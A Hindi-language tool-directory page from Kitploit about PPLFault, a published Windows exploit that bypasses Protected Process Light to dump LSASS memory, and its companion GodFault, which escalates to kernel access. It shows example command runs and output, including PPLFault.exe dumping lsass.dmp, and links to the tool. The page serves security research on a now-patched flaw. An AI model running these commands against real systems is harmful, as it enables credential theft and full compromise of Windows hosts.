Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PPLFault — Windows विशेषाधिकार वृद्धि एक्सप्लॉइट जो Code Integrity में TOCTOU का दुरुपयोग करके Protected Process Light को बायपास करता है, WinTcb-Light के रूप में निष्पादित होता है, और संरक्षित प्रक्रियाओं (जैसे, LSASS) को डंप करता है। | Kitploit
उपकरण/GitHubGitHub/gabriellandau/pplfault
विशेषाधिकार वृद्धिशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगArchived
GitHubgabriellandau/pplfault

PPLFault

Windows विशेषाधिकार वृद्धि एक्सप्लॉइट जो Code Integrity में TOCTOU का दुरुपयोग करके Protected Process Light को बायपास करता है, WinTcb-Light के रूप में निष्पादित होता है, और संरक्षित प्रक्रियाओं (जैसे, LSASS) को डंप करता है।

रिपॉजिटरी देखें
567812 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PPLFault

Gabriel Landau द्वारा Elastic Security में।

यह PPLdump मर चुका है। PPLdump लंबे समय तक जीवित रहे! से लिया गया है, जिसे Black Hat Asia 2023 में प्रस्तुत किया गया।

PPLdump मर चुका है। PPLdump लंबे समय तक जीवित रहे!

PPLFault

2024-02 अपडेट: Microsoft ने 2024-02-13 को PPLFault को पैच किया। संबंधित चर्चा के लिए यह थ्रेड देखें।

विंडोज़ कोड इंटीग्रिटी में एक TOCTOU का शोषण करके WinTcb-Light के रूप में मनमाना कोड निष्पादन प्राप्त करता है और फिर एक निर्दिष्ट प्रक्रिया को डंप करता है। शोषण के बारे में अधिक जानकारी के लिए, मेरी स्लाइड्स और/या वार्ता देखें।

उदाहरण आउटपुट

root@kitploit:~
PS C:\Users\user\Desktop> cmd /c ver

Microsoft Windows [Version 10.0.25346.1001]
PS C:\Users\user\Desktop> tasklist | findstr lsass
lsass.exe                      992 Services                   0     76,620 K
PS C:\Users\user\Desktop> (Get-NtProcess -Access QueryLimitedInformation -Pid 992).Protection

Type           Signer
----           ------
ProtectedLight Lsa


PS C:\Users\user\Desktop> dir *.dmp
PS C:\Users\user\Desktop> .\PPLFault.exe -v 992 lsass.dmp
 [+] No cleanup necessary.  Backup does not exist.
 [+] GetShellcode: 528 bytes of shellcode written over DLL entrypoint
 [+] Benign: C:\Windows\System32\EventAggregation.dll.bak
 [+] Payload: C:\PPLFaultTemp\PPLFaultPayload.dll
 [+] Placeholder: C:\PPLFaultTemp\EventAggregationPH.dll
 [+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
 [+] Ready.  Spawning WinTcb.
 [+] SpawnPPL: Waiting for child process to finish.
 [+] FetchDataCallback called.
 [+] Hydrating 90112 bytes at offset 0
 [+] Switching to payload
 [+] Emptying system working set
 [+] Working set purged
 [+] Give the memory manager a moment to think
 [+] Hydrating 90112 PAYLOAD bytes at offset 0
 [+] Dump saved to: lsass.dmp
 [+] Dump is 74.9 MB
 [+] Operation took 937 ms
PS C:\Users\user\Desktop> dir *.dmp


    Directory: C:\Users\user\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          5/1/2023  11:18 AM       78581973 lsass.dmp

GodFault

यह PPLFault के समान TOCTOU का शोषण करता है। हालाँकि, किसी प्रक्रिया को डंप करने के बजाय, यह CSRSS में माइग्रेट होता है और win32k!NtUserHardErrorControlCall में ANGRYORCHARD से एक भेद्यता का शोषण करके KTHREAD.PreviousMode को UserMode (1) से KernelMode (0) तक घटाता है। यह \Device\PhysicalMemory को SECTION_ALL_ACCESS के रूप में खोलकर "गॉड मोड" पहुंच साबित करता है, जो सामान्यतः UserMode से अप्राप्य है।

उदाहरण आउटपुट

root@kitploit:~
C:\Users\user\Desktop>GodFault.exe -v
 [?] Server does not appear to be running.  Attempting to install it...
 [+] No cleanup necessary.  Backup does not exist.
 [+] GetShellcode: 2304 bytes of shellcode written over DLL entrypoint
 [+] CSRSS PID is 772
 [+] Benign: C:\Windows\System32\EventAggregation.dll.bak
 [+] Payload: C:\GodFaultTemp\GodFaultPayload.dll
 [+] Placeholder: C:\GodFaultTemp\EventAggregationPH.dll
 [+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
 [+] Testing initial ability to acquire PROCESS_ALL_ACCESS to System: Failure
 [+] Ready.  Spawning WinTcb.
 [+] SpawnPPL: Waiting for child process to finish.
 [+] FetchDataCallback called.
 [+] Hydrating 90112 bytes at offset 0
 [+] Switching to payload
 [+] Emptying system working set
 [+] Working set purged
 [+] Give the memory manager a moment to think
 [+] Hydrating 90112 PAYLOAD bytes at offset 0
 [+] Thread 6248 (KTHREAD FFFFA283B0A62080) has been blessed
 [+] Testing post-exploit ability to acquire PROCESS_ALL_ACCESS to System: Success
 [+] Opened \Device\PhysicalMemory.  Handle is 0x1b4
 [+] Opened System process as PROCESS_ALL_ACCESS.  Handle is 0x1c0
 [+] Press any key to continue...
 [+] No cleanup necessary.  Backup does not exist.

Python

PoC जो CloudFilter API के बिना WinTcb-Light के रूप में मनमाना कोड निष्पादन प्राप्त करता है। python/README.md देखें।

परीक्षित प्लेटफ़ॉर्म

Windows 11 22H2 22621.1702 (मई 2023)Windows 11 Insider Canary 25346.1001 (अप्रैल 2023)
PPLFault✔️✔️
GodFault✔️❌ Insider PreviousMode शमन bugchecks

लाइसेंस

PPLFault ELv2 लाइसेंस द्वारा कवर किया गया है। यह SystemInformer से phnt का उपयोग MIT लाइसेंस के तहत करता है।

श्रेय

PPLdump से प्रेरित, Clément Labro द्वारा, जिसे Microsoft ने जुलाई 2022 में पैच किया।

ANGRYORCHARD को Austin Hudson ने बनाया था, जिन्होंने इसे तब जारी किया जब Microsoft ने PPLdump को पैच किया।

टूल डाउनलोड करें